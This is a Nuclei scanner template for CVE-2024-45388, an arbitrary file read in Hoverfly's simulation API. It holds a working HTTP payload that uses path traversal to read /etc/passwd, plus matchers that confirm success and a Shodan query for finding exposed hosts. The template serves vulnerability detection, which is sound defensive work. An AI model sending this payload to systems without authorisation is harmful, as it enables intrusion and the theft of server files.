48 lines
1.6 KiB
YAML
48 lines
1.6 KiB
YAML
id: CVE-2024-45388
|
|
|
|
info:
|
|
name: Hoverfly < 1.10.3 - Arbitrary File Read
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: high
|
|
description: |
|
|
Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.
|
|
reference:
|
|
- https://github.com/advisories/GHSA-6xx4-x46f-f897
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-45388
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2024-45388
|
|
cwe-id: CWE-20
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
shodan-query: http.favicon.hash:1357234275
|
|
tags: cve,cve2024,hoverfly,lfi,intrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
PUT /api/v2/simulation HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
{"data":{"pairs":[{"request":{},"response":{"bodyFile": "../../../../../../../etc/passwd","x":"aaa"}} ]},"meta":{"schemaVersion":"v5.3"}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
- 'hoverflyVersion'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- application/json
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402206e446f0a59539efbc9bfd18591b8aec67238c46870ce32d6be75034712138e4402202003f6efb4ef4efe6e2c5fa5b61539b8fb722f020e81793c25cb898b12f448df:922c64590222798bb761d5b6d8e72950 |